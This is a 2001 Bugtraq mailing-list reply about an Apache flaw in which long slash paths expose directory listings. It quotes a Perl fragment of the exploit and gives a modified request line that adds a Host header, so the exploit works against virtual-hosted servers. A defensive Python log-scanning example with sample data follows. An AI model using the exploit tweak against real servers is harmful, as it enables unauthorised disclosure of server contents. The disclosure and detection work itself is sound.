Bugtraq mailing list archives

Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit


From: Stephen Cope <mail-d-20010615 () kimihia org nz>
Date: Fri, 15 Jun 2001 14:48:44 +1200

In my testing you need to take the Host header into account.

:   $url = "GET ";
:   $buffer = "/" x $low . " HTTP/1.0\r\n";
:   $end = "\r\n\r\n";

The server I tested against uses mod_rewrite to do virtual hosting, and it
arrived at a different magic number with the Host header than without the
header.

I made the following change to the above code:

  $buffer = "/" x $low . " HTTP/1.0\r\nHost: ". $host ."\r\n";

Should be fairly easy to understand.

-- 
Stephen Cope <http://sdc.org.nz/>
Sign the petition and Stop the Pop: http://lifefm.org.nz/petition/
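
For defenders, the point above (the slash count that matters depends on which virtual host serves the request) means access logs are best reviewed per virtual host. The following is an added example, not part of the original post or the quoted script: it flags requests with long slash runs and groups them by virtual host and client. The log format, the thresholds and all sample data are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed log layout (not from the post): LogFormat "%v %h %l %u %t \"%r\" %>s %b",
# so the first field is the virtual host that actually served the request.
LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<path>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) \S+$'
)
SLASH_RUN_RE = re.compile(r"/{2,}")

def longest_slash_run(path):
    """Length of the longest run of consecutive slashes in a request path."""
    return max((len(m.group()) for m in SLASH_RUN_RE.finditer(path)), default=0)

def find_slash_probes(lines, min_run=32):
    """Map (vhost, client) -> [(run_length, status), ...] for long-slash requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess
        run = longest_slash_run(m.group("path"))
        if run >= min_run:
            key = (m.group("vhost"), m.group("client"))
            hits[key].append((run, int(m.group("status"))))
    return dict(hits)

def find_sweeps(hits, min_distinct=3):
    """(vhost, client) pairs that tried several different slash counts."""
    return sorted(k for k, v in hits.items() if len({run for run, _ in v}) >= min_distinct)

def _line(vhost, client, path, status):
    return f'{vhost} {client} - - [15/Jun/2001:14:40:00 +1200] "GET {path} HTTP/1.0" {status} 512'

# Constructed sample log; hosts, addresses, slash counts and statuses are arbitrary.
SAMPLE_LOG = [
    _line("www.example.org", "192.0.2.10", "/index.html", 200),
    _line("www.example.org", "198.51.100.5", "/a//b", 200),
    _line("www.example.org", "192.0.2.77", "/" * 200, 403),
    _line("www.example.org", "192.0.2.77", "/" * 400, 403),
    _line("www.example.org", "192.0.2.77", "/" * 600, 200),
    _line("default.example.org", "192.0.2.77", "/" * 200, 200),
]

if __name__ == "__main__":
    hits = find_slash_probes(SAMPLE_LOG)
    for (vhost, client), seen in sorted(hits.items()):
        print(vhost, client, seen)
    print("sweeps:", find_sweeps(hits))
```

A change from an error status to 200 within one client's sweep against a single virtual host is the entry worth following up first.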

